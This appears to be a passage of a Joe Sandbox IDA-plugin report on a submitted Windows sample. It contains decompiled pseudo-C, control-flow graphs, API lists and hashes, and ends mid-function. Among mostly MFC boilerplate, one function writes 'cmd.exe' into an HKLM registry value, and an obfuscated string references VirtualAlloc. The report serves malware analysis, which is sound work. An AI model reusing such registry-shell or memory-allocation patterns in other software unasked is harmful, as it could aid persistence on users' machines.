                                                      • String ID: 6Z6x8!4zpUCX@R#toJr^+TCgAUZ(Q%ylNN>>FTZD_XQd$eGdqe@v?1J48XWg!*)(O9tF@RENQV27J_nbjWhEt%U5@&RL(^C?NZe>&SRx1xAVYzU6ZpO^Q$UUACZDADWAJJJJJ$VirtualAlloc$kernel32.dll
                                                      • API String ID: 788825803-1877897661
                                                      • Opcode ID: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
                                                      • Instruction ID: ff84c4e7adf23d41df9a6f65582e714f74d1400c784c60132990823294043f06
                                                      • Opcode Fuzzy Hash: 0c317e2cec8b35522e85a97d8f9b33161106303d3713bb799065d46ae679c45d
                                                      • Instruction Fuzzy Hash: 3B711AB4E40208EBDB14DBA5C955BAEB7B5BF48704F20422EF5017B2D1D7796901CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 183 41ab2a-41ab75 call 40db94 GetModuleFileNameA 186 41ab77-41ab79 183->186 187 41ab7b call 40e0f0 183->187 186->187 188 41ab80-41ab92 PathFindExtensionA 186->188 187->188 190 41ab94 call 40e0f0 188->190 191 41ab99-41abb5 call 41aaec 188->191 190->191 195 41abb7 call 40e0f0 191->195 196 41abbc-41abc0 191->196 195->196 197 41abc2-41abd4 call 41fd45 196->197 198 41abdb-41abe0 196->198 197->198 209 41abd6 197->209 201 41abe2-41abf7 call 40dda7 198->201 202 41ac0f-41ac16 198->202 215 41abf9-41abfd 201->215 216 41abff 201->216 205 41ac59-41ac5d 202->205 206 41ac18-41ac25 202->206 211 41ac91-41aca8 call 41e5df 205->211 212 41ac5f-41ac8b call 421a5d call 402f17 call 41fd45 205->212 207 41ac27-41ac2c 206->207 208 41ac2e 206->208 213 41ac33-41ac51 call 403ebb call 41fd45 207->213 208->213 209->198 212->209 212->211 213->209 230 41ac53-41ac56 213->230 220 41ac02-41ac0d call 41fd45 215->220 216->220 220->202 220->209 230->205
                                                      C-Code - Quality: 62%
                                                      			E0041AB2A(void* __ecx, void* __edx, void* __eflags, char _a132, char _a392, signed int _a652, char _a656) {
                                                      				char _v124;
                                                      				char* _v128;
                                                      				char _v660;
                                                      				char _v804;
                                                      				char _v812;
                                                      				char _v820;
                                                      				intOrPtr _v832;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t44;
                                                      				char* _t53;
                                                      				char* _t57;
                                                      				void* _t59;
                                                      				intOrPtr _t73;
                                                      				void* _t76;
                                                      				char* _t79;
                                                      				char* _t81;
                                                      				char* _t84;
                                                      				void* _t87;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				intOrPtr _t93;
                                                      				void* _t94;
                                                      				void* _t95;
                                                      				void* _t96;
                                                      				void* _t97;
                                                      				void* _t99;
                                                      				void* _t100;
                                                      				signed int _t102;
                                                      				void* _t105;
                                                      				void* _t106;
                                                      				void* _t108;
                                                      				void* _t109;
                                                      
                                                      				_t94 = __edx;
                                                      				_t90 = __ecx;
                                                      				_t102 =  &_v660;
                                                      				_t109 = _t108 - 0x310;
                                                      				_t44 =  *0x443590; // 0xa920217c
                                                      				_a652 = _t44 ^ _t102;
                                                      				_push(_t87);
                                                      				_push(_t95);
                                                      				_t99 = __ecx;
                                                      				_t96 = E0040DB94(_t87, _t95, __ecx, __eflags);
                                                      				 *(_t96 + 8) =  *(_t99 + 0x44);
                                                      				 *(_t96 + 0xc) =  *(_t99 + 0x44);
                                                      				if(GetModuleFileNameA( *(_t99 + 0x44),  &_a392, 0x104) == 0) {
                                                      					L7:
                                                      					E0040E0F0(_t90);
                                                      				} else {
                                                      					__eflags = __eax - 0x104;
                                                      					if(__eax == 0x104) {
                                                      						goto L7;
                                                      					}
                                                      				}
                                                      				_t53 = PathFindExtensionA( &_a392); // executed
                                                      				__eflags = _t53;
                                                      				_v128 = _t53;
                                                      				if(_t53 == 0) {
                                                      					E0040E0F0(_t90);
                                                      				}
                                                      				 *_v128 = 0;
                                                      				_t57 = E0041AAEC( &_a392,  &_a132, 0x104);
                                                      				__eflags = _t57;
                                                      				if(_t57 != 0) {
                                                      					E0040E0F0(_t90);
                                                      				}
                                                      				__eflags =  *(_t99 + 0x60);
                                                      				if( *(_t99 + 0x60) != 0) {
                                                      					L15:
                                                      					_t58 =  *(_t99 + 0x50);
                                                      					__eflags = _t58;
                                                      					if(_t58 != 0) {
                                                      						L20:
                                                      						 *(_t96 + 0x10) = _t58;
                                                      						__eflags =  *(_t99 + 0x64);
                                                      						if( *(_t99 + 0x64) != 0) {
                                                      							L26:
                                                      							__eflags =  *(_t99 + 0x68);
                                                      							if( *(_t99 + 0x68) != 0) {
                                                      								L28:
                                                      								_pop(_t97);
                                                      								_pop(_t100);
                                                      								_pop(_t89);
                                                      								_t59 = E0041E5DF(_t58, _t89, _a652 ^ _t102, _t94, _t97, _t100);
                                                      								__eflags =  &_a656;
                                                      								return _t59;
                                                      							} else {
                                                      								_push(E00421A5D(_t94,  &_a132, 0x104, ".INI"));
                                                      								E00402F17(0x104, _t90, _t96, _t99);
                                                      								_t58 = E0041FD45( &_a132);
                                                      								_t109 = _t109 + 0x14;
                                                      								__eflags = _t58;
                                                      								 *(_t99 + 0x68) = _t58;
                                                      								if(_t58 == 0) {
                                                      									goto L14;
                                                      								} else {
                                                      									goto L28;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t76 =  &_a652 - _v128;
                                                      							__eflags =  *((intOrPtr*)(_t99 + 0x6c)) - 1;
                                                      							if( *((intOrPtr*)(_t99 + 0x6c)) != 1) {
                                                      								_push(".HLP");
                                                      							} else {
                                                      								_push(".CHM");
                                                      							}
                                                      							_push(_t76);
                                                      							_push(_v128);
                                                      							E00403EBB(0x104, _t94, _t96, _t99, _t102);
                                                      							_t109 = _t109 + 0xc;
                                                      							_t79 = E0041FD45( &_a392);
                                                      							__eflags = _t79;
                                                      							_pop(_t90);
                                                      							 *(_t99 + 0x64) = _t79;
                                                      							if(_t79 == 0) {
                                                      								goto L14;
                                                      							} else {
                                                      								_t58 = _v128;
                                                      								 *_v128 = 0;
                                                      								goto L26;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t81 = E0040DDA7(0x104, _t90, _t96, _t99, _t102, 0xe000,  &_v124, 0x100);
                                                      						__eflags = _t81;
                                                      						if(_t81 == 0) {
                                                      							_push( *(_t99 + 0x60));
                                                      						} else {
                                                      							_push( &_v124);
                                                      						}
                                                      						_t58 = E0041FD45();
                                                      						__eflags = _t58;
                                                      						 *(_t99 + 0x50) = _t58;
                                                      						_pop(_t90);
                                                      						if(_t58 == 0) {
                                                      							goto L14;
                                                      						} else {
                                                      							goto L20;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t84 = E0041FD45( &_a132);
                                                      					__eflags = _t84;
                                                      					_pop(_t90);
                                                      					 *(_t99 + 0x60) = _t84;
                                                      					if(_t84 != 0) {
                                                      						goto L15;
                                                      					} else {
                                                      						L14:
                                                      						_push(_t102);
                                                      						_t105 = _t109;
                                                      						_push(_t90);
                                                      						_v804 = 0x442350;
                                                      						E0041F7F4( &_v804, 0x43c4ec);
                                                      						asm("int3");
                                                      						_push(_t105);
                                                      						_t106 = _t109;
                                                      						_push(_t90);
                                                      						_t11 =  &_v812; // 0x442350
                                                      						_v812 = 0x4423e8;
                                                      						E0041F7F4(_t11, 0x43c54c);
                                                      						asm("int3");
                                                      						_push(_t106);
                                                      						_push(_t90);
                                                      						_t13 =  &_v820; // 0x4423e8
                                                      						_v820 = 0x442480;
                                                      						E0041F7F4(_t13, 0x43c590);
                                                      						asm("int3");
                                                      						_push(4);
                                                      						E0041F6EA(E00431BFC, 0x104, _t96, _t99);
                                                      						_t93 = E0040F014(0x104);
                                                      						_v832 = _t93;
                                                      						_t73 = 0;
                                                      						_v820 = 0;
                                                      						if(_t93 != 0) {
                                                      							_t73 = E0040D519(_t93);
                                                      						}
                                                      						return E0041F7C2(_t73);
                                                      					}
                                                      				}
                                                      			}


                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                                                      • String ID: .CHM$.HLP$.INI
                                                      • API String ID: 1153805871-4017452060
                                                      • Opcode ID: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
                                                      • Instruction ID: 57232d50dc1b964aec71869080f5721069c83be35b5a1d3d80364e0175c1dcf5
                                                      • Opcode Fuzzy Hash: c49fd2a1216ea896ee94d8016267d423bc5801ae71d4a536f5c85aa2f1552b22
                                                      • Instruction Fuzzy Hash: 51416D715012499FDB30EFA9CD85BDB77ECBF04308F00482BE945D6641EB78E9948B69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 232 402750-402795 RegCreateKeyExA 233 402833-402839 232->233 234 40279b-4027b2 GetVersion 232->234 235 4027b4-4027c5 call 41eb60 234->235 236 4027c7-4027d5 call 41eb60 234->236 241 4027d8-4027fe RegQueryValueExA 235->241 236->241 242 402800-402826 lstrlenA RegSetValueExA 241->242 243 402829-40282d RegCloseKey 241->243 242->243 243->233
                                                      C-Code - Quality: 100%
                                                      			E00402750(intOrPtr __ecx, CHAR* _a4) {
                                                      				void* _v8;
                                                      				int _v12;
                                                      				long _v16;
                                                      				long _v20;
                                                      				int _v24;
                                                      				int _v28;
                                                      				intOrPtr _v32;
                                                      				long _t32;
                                                      				int _t34;
                                                      				char* _t36;
                                                      				long _t37;
                                                      				char* _t46;
                                                      				char* _t48;
                                                      
                                                      				_v32 = __ecx;
                                                      				_v8 = 0;
                                                      				_v16 = 0;
                                                      				_t46 =  *0x442000; // 0x4346d4
                                                      				_v16 = RegCreateKeyExA(0x80000002, _t46, 0, 0, 0, 0x2001f, 0,  &_v8,  &_v12);
                                                      				if(_v16 == 0) {
                                                      					_v28 = 0x104;
                                                      					_v20 = GetVersion();
                                                      					if(_v20 >= 0x80000000) {
                                                      						E0041EB60(_a4, "command.com");
                                                      					} else {
                                                      						E0041EB60(_a4, "cmd.exe");
                                                      					}
                                                      					_t48 =  *0x442008; // 0x434684
                                                      					_t32 = RegQueryValueExA(_v8, _t48, 0,  &_v24, _a4,  &_v28); // executed
                                                      					_v16 = _t32;
                                                      					if(_v16 != 0) {
                                                      						_t34 = lstrlenA(_a4);
                                                      						_t36 =  *0x442008; // 0x434684
                                                      						_t37 = RegSetValueExA(_v8, _t36, 0, 1, _a4, _t34 + 1); // executed
                                                      						_v16 = _t37;
                                                      					}
                                                      					RegCloseKey(_v8);
                                                      				}
                                                      				return _v16;
                                                      			}

















                                                      APIs
                                                      • RegCreateKeyExA.ADVAPI32(80000002,004346D4,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 00402788
                                                      • GetVersion.KERNEL32 ref: 004027A2
                                                      • _strcat.LIBCMT ref: 004027BD
                                                      • _strcat.LIBCMT ref: 004027D0
                                                      • RegQueryValueExA.KERNELBASE(00000000,00434684,00000000,?,?,00000104), ref: 004027F1
                                                      • lstrlenA.KERNEL32(?), ref: 00402804
                                                      • RegSetValueExA.KERNELBASE(00000000,00434684,00000000,00000001,?,-00000001), ref: 00402820
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040282D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Value_strcat$CloseCreateQueryVersionlstrlen
                                                      • String ID: cmd.exe$command.com
                                                      • API String ID: 2337509535-906605525
                                                      • Opcode ID: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
                                                      • Instruction ID: 5414f4e155f680cb360236f53e8781cc7486691db9c8143961ece0993b29ec0d
                                                      • Opcode Fuzzy Hash: 23a86dbd8a56b400e1eae7f4a72586dde06780c802320ec2f8d035002184cb91
                                                      • Instruction Fuzzy Hash: CB21EAB9D00208EFDB14DFD5DD49BEEB7B8AB48701F108569F605A7280D7B86644CFA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 310 40f1af-40f1cc EnterCriticalSection 311 40f1db-40f1e0 310->311 312 40f1ce-40f1d5 310->312 314 40f1e2-40f1e5 311->314 315 40f1fd-40f205 311->315 312->311 313 40f293-40f296 312->313 317 40f298-40f29b 313->317 318 40f29e-40f2be LeaveCriticalSection 313->318 316 40f1e8-40f1eb 314->316 319 40f207-40f21a call 40ead1 GlobalAlloc 315->319 320 40f21c-40f23d GlobalHandle GlobalUnlock call 40ead1 GlobalReAlloc 315->320 322 40f1f5-40f1f7 316->322 323 40f1ed-40f1f3 316->323 317->318 327 40f243-40f245 319->327 320->327 322->313 322->315 323->316 323->322 328 40f247-40f24c 327->328 329 40f26b-40f290 GlobalLock call 41f330 327->329 330 40f25c-40f260 LeaveCriticalSection 328->330 331 40f24e-40f256 GlobalHandle GlobalLock 328->331 329->313 330->329 331->330
                                                      C-Code - Quality: 80%
                                                      			E0040F1AF() {
                                                      				struct _CRITICAL_SECTION* _v4;
                                                      				char _v28;
                                                      				char _v36;
                                                      				char _v44;
                                                      				intOrPtr _v56;
                                                      				void* __ebx;
                                                      				intOrPtr __ecx;
                                                      				signed int __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				struct _CRITICAL_SECTION* _t39;
                                                      				intOrPtr _t40;
                                                      				void* _t41;
                                                      				long _t44;
                                                      				void* _t45;
                                                      				signed int* _t51;
                                                      				intOrPtr _t64;
                                                      				long _t68;
                                                      				void* _t69;
                                                      				void* _t70;
                                                      				signed int _t72;
                                                      				intOrPtr _t78;
                                                      				signed int _t82;
                                                      				void* _t86;
                                                      				signed int _t88;
                                                      				void* _t90;
                                                      				void* _t91;
                                                      				void* _t93;
                                                      
                                                      				_push(_t72);
                                                      				_push(_t69);
                                                      				_push(_t88);
                                                      				_t86 = _t72;
                                                      				_t1 = _t86 + 0x1c; // 0x4465f0
                                                      				_t39 = _t1;
                                                      				_v4 = _t39;
                                                      				EnterCriticalSection(_t39);
                                                      				_t3 = _t86 + 4; // 0x20
                                                      				_t40 =  *_t3;
                                                      				_t4 = _t86 + 8; // 0x3
                                                      				_t82 =  *_t4;
                                                      				if(_t82 >= _t40) {
                                                      					L7:
                                                      					_t82 = 1;
                                                      					__eflags = _t40 - 1;
                                                      					if(_t40 <= 1) {
                                                      						L12:
                                                      						_t21 = _t40 + 0x20; // 0x40
                                                      						_t88 = _t21;
                                                      						_t22 = _t86 + 0x10; // 0x5c00f8
                                                      						_t41 =  *_t22;
                                                      						__eflags = _t41;
                                                      						if(__eflags != 0) {
                                                      							_t69 = GlobalHandle(_t41);
                                                      							GlobalUnlock(_t69);
                                                      							_t44 = E0040EAD1(_t72, __eflags, _t88, 8);
                                                      							_t72 = 0x2002;
                                                      							_t45 = GlobalReAlloc(_t69, _t44, ??);
                                                      						} else {
                                                      							_t68 = E0040EAD1(_t72, __eflags, _t88, 8);
                                                      							_pop(_t72);
                                                      							_t45 = GlobalAlloc(2, _t68); // executed
                                                      						}
                                                      						__eflags = _t45;
                                                      						if(_t45 != 0) {
                                                      							_t70 = GlobalLock(_t45);
                                                      							_t25 = _t86 + 4; // 0x20
                                                      							__eflags = _t88 -  *_t25 << 3;
                                                      							E0041F330(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
                                                      							 *(_t86 + 4) = _t88;
                                                      							 *(_t86 + 0x10) = _t70;
                                                      							goto L20;
                                                      						} else {
                                                      							_t23 = _t86 + 0x10; // 0x5c00f8
                                                      							_t86 =  *_t23;
                                                      							__eflags = _t86;
                                                      							if(_t86 != 0) {
                                                      								GlobalLock(GlobalHandle(_t86));
                                                      							}
                                                      							LeaveCriticalSection(_v4);
                                                      							_push(_t88);
                                                      							_t90 = _t93;
                                                      							_push(_t72);
                                                      							_v28 = 0x442350;
                                                      							E0041F7F4( &_v28, 0x43c4ec);
                                                      							asm("int3");
                                                      							_push(_t90);
                                                      							_t91 = _t93;
                                                      							_push(_t72);
                                                      							_t7 =  &_v36; // 0x442350
                                                      							_v36 = 0x4423e8;
                                                      							E0041F7F4(_t7, 0x43c54c);
                                                      							asm("int3");
                                                      							_push(_t91);
                                                      							_push(_t72);
                                                      							_t9 =  &_v44; // 0x4423e8
                                                      							_v44 = 0x442480;
                                                      							E0041F7F4(_t9, 0x43c590);
                                                      							asm("int3");
                                                      							_push(4);
                                                      							E0041F6EA(E00431BFC, _t69, _t82, _t86);
                                                      							_t78 = E0040F014(0x104);
                                                      							_v56 = _t78;
                                                      							_t64 = 0;
                                                      							_v44 = 0;
                                                      							if(_t78 != 0) {
                                                      								_t64 = E0040D519(_t78);
                                                      							}
                                                      							return E0041F7C2(_t64);
                                                      						}
                                                      					} else {
                                                      						_t18 = _t86 + 0x10; // 0x5c00f8
                                                      						_t72 =  *_t18 + 8;
                                                      						__eflags = _t72;
                                                      						while(1) {
                                                      							__eflags =  *_t72 & 0x00000001;
                                                      							if(( *_t72 & 0x00000001) == 0) {
                                                      								break;
                                                      							}
                                                      							_t82 = _t82 + 1;
                                                      							_t72 = _t72 + 8;
                                                      							__eflags = _t82 - _t40;
                                                      							if(_t82 < _t40) {
                                                      								continue;
                                                      							}
                                                      							break;
                                                      						}
                                                      						__eflags = _t82 - _t40;
                                                      						if(_t82 < _t40) {
                                                      							goto L20;
                                                      						} else {
                                                      							goto L12;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t13 = __esi + 0x10; // 0x5c00f8
                                                      					__ecx =  *_t13;
                                                      					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
                                                      					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
                                                      						L20:
                                                      						_t30 = _t86 + 0xc; // 0x3
                                                      						__eflags = _t82 -  *_t30;
                                                      						if(_t82 >=  *_t30) {
                                                      							_t31 = _t82 + 1; // 0x4
                                                      							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
                                                      						}
                                                      						_t33 = _t86 + 0x10; // 0x5c00f8
                                                      						_t51 =  *_t33 + _t82 * 8;
                                                      						 *_t51 =  *_t51 | 0x00000001;
                                                      						__eflags =  *_t51;
                                                      						_t37 = _t82 + 1; // 0x4
                                                      						 *(_t86 + 8) = _t37;
                                                      						LeaveCriticalSection(_v4);
                                                      						return _t82;
                                                      					} else {
                                                      						goto L7;
                                                      					}
                                                      				}
                                                      			}
































                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(004465F0,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F1BE
                                                      • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040F214
                                                      • GlobalHandle.KERNEL32(005C00F8), ref: 0040F21D
                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F226
                                                      • GlobalReAlloc.KERNEL32 ref: 0040F23D
                                                      • GlobalHandle.KERNEL32(005C00F8), ref: 0040F24F
                                                      • GlobalLock.KERNEL32 ref: 0040F256
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,004465D4,0040F5D8,00000004,0040DBA3,004037FD,004048F5,?,00404F86,00000004,004044D3,00000004), ref: 0040F260
                                                      • GlobalLock.KERNEL32 ref: 0040F26C
                                                      • _memset.LIBCMT ref: 0040F285
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040F2B1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                      • String ID:
                                                      • API String ID: 496899490-0
                                                      • Opcode ID: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
                                                      • Instruction ID: 472e247d442e6808826630594bb4930a6e592a8447ca6d80117307b8de69ac9d
                                                      • Opcode Fuzzy Hash: ab9b4bc25e8910a791046d6b5618164ea1d03aab9b28a44e83847fc91879861a
                                                      • Instruction Fuzzy Hash: D031AD79204B049FD724CF64DC48A67B7E8FB84344B00497EE852E3A91EB39F9488B18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 96%
                                                      			E0040B3B1(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				_Unknown_base(*)()* _t31;
                                                      				void* _t33;
                                                      				void* _t34;
                                                      				long _t39;
                                                      				void* _t40;
                                                      				void* _t43;
                                                      				void* _t60;
                                                      				void* _t64;
                                                      				struct HWND__* _t66;
                                                      				CHAR* _t68;
                                                      				void* _t71;
                                                      
                                                      				_t64 = __edx;
                                                      				_t60 = __ecx;
                                                      				_push(0x40);
                                                      				E0041F71D(E00432451, __ebx, __edi, __esi);
                                                      				_t66 =  *(_t71 + 8);
                                                      				_t68 = "AfxOldWndProc423";
                                                      				_t31 = GetPropA(_t66, _t68);
                                                      				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
                                                      				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
                                                      				 *(_t71 - 0x18) = _t31;
                                                      				_t58 = 1;
                                                      				_t33 =  *(_t71 + 0xc) - 6;
                                                      				if(_t33 == 0) {
                                                      					_t34 = E00409C97(1, _t60, _t71,  *(_t71 + 0x14));
                                                      					E0040B2C5(_t60, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
                                                      					goto L9;
                                                      				} else {
                                                      					_t40 = _t33 - 0x1a;
                                                      					if(_t40 == 0) {
                                                      						_t58 = 0 | E0040B33B(1, _t66, E00409C97(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
                                                      						L9:
                                                      						if(_t58 != 0) {
                                                      							goto L10;
                                                      						}
                                                      					} else {
                                                      						_t43 = _t40 - 0x62;
                                                      						if(_t43 == 0) {
                                                      							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
                                                      							RemovePropA(_t66, _t68);
                                                      							GlobalDeleteAtom(GlobalFindAtomA(_t68));
                                                      							goto L10;
                                                      						} else {
                                                      							if(_t43 != 0x8e) {
                                                      								L10:
                                                      								_t39 = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14)); // executed
                                                      								 *(_t71 - 0x14) = _t39;
                                                      							} else {
                                                      								E004089E1(E00409C97(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
                                                      								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
                                                      								E0040A26C(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return E0041F7C2( *(_t71 - 0x14));
                                                      			}

                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 0040B3B8
                                                      • GetPropA.USER32 ref: 0040B3C7
                                                      • CallWindowProcA.USER32 ref: 0040B421
                                                        • Part of subcall function 0040A26C: GetWindowRect.USER32 ref: 0040A294
                                                        • Part of subcall function 0040A26C: GetWindow.USER32(?,00000004), ref: 0040A2B1
                                                      • SetWindowLongA.USER32 ref: 0040B448
                                                      • RemovePropA.USER32 ref: 0040B450
                                                      • GlobalFindAtomA.KERNEL32 ref: 0040B457
                                                      • GlobalDeleteAtom.KERNEL32 ref: 0040B45E
                                                        • Part of subcall function 004089E1: GetWindowRect.USER32 ref: 004089ED
                                                      • CallWindowProcA.USER32 ref: 0040B4B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                      • String ID: AfxOldWndProc423
                                                      • API String ID: 2702501687-1060338832
                                                      • Opcode ID: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
                                                      • Instruction ID: 0993d68df0da385a064f2654fdce3d9da4ed98816b6640c1b1e46963a59409c9
                                                      • Opcode Fuzzy Hash: 01eafed39850b2931418d763da063fa8131308eeaf296203092cb49c53425a31
                                                      • Instruction Fuzzy Hash: 40316D7280020AABCB01AFA4DD49DFF7E78EF45310F00013AF941B21A2C7789A119BA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 91%
                                                      			E00401450(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                      				char _v8;
                                                      				char _v16;
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v36;
                                                      				char _v303;
                                                      				char _v304;
                                                      				char _v2351;
                                                      				char _v2352;
                                                      				signed int _v2356;
                                                      				intOrPtr* _v2360;
                                                      				intOrPtr* _v2364;
                                                      				intOrPtr _v2392;
                                                      				intOrPtr _v2416;
                                                      				intOrPtr _v2420;
                                                      				intOrPtr _v2444;
                                                      				intOrPtr _v2448;
                                                      				struct HINSTANCE__* _v2452;
                                                      				intOrPtr* _v2456;
                                                      				void* __ebp;
                                                      				signed int _t101;
                                                      				signed int _t102;
                                                      				intOrPtr _t111;
                                                      				void* _t112;
                                                      				intOrPtr _t113;
                                                      				void* _t114;
                                                      				intOrPtr _t115;
                                                      				void* _t116;
                                                      				intOrPtr _t117;
                                                      				void* _t118;
                                                      				char _t119;
                                                      				intOrPtr _t129;
                                                      				struct HICON__* _t138;
                                                      				void* _t141;
                                                      				char _t183;
                                                      				void* _t201;
                                                      				void* _t202;
                                                      				signed int _t203;
                                                      				void* _t204;
                                                      				void* _t205;
                                                      				void* _t207;
                                                      
                                                      				_t209 = __eflags;
                                                      				_t202 = __esi;
                                                      				_t201 = __edi;
                                                      				_t141 = __ebx;
                                                      				_push(0xffffffff);
                                                      				_push(E00431ADC);
                                                      				_push( *[fs:0x0]);
                                                      				_t205 = _t204 - 0x988;
                                                      				_t101 =  *0x443590; // 0xa920217c
                                                      				_t102 = _t101 ^ _t203;
                                                      				_v36 = _t102;
                                                      				_push(_t102);
                                                      				 *[fs:0x0] =  &_v16;
                                                      				_v2456 = __ecx;
                                                      				E00405CC0(_v2456, 0x67, _a4);
                                                      				_v8 = 0;
                                                      				 *_v2456 = 0x434b2c;
                                                      				_v2360 = _v2456 + 0x78;
                                                      				E0040899E(_v2360, __eflags);
                                                      				 *_v2360 = 0x4349f4;
                                                      				_v8 = 1;
                                                      				_v2364 = _v2456 + 0xcc;
                                                      				E0040899E(_v2364, _t209);
                                                      				 *_v2364 = 0x4349f4;
                                                      				_v8 = 2;
                                                      				E00402890(_v2456 + 0x12c);
                                                      				_v8 = 3;
                                                      				E00402890(_v2456 + 0x134);
                                                      				_v8 = 4;
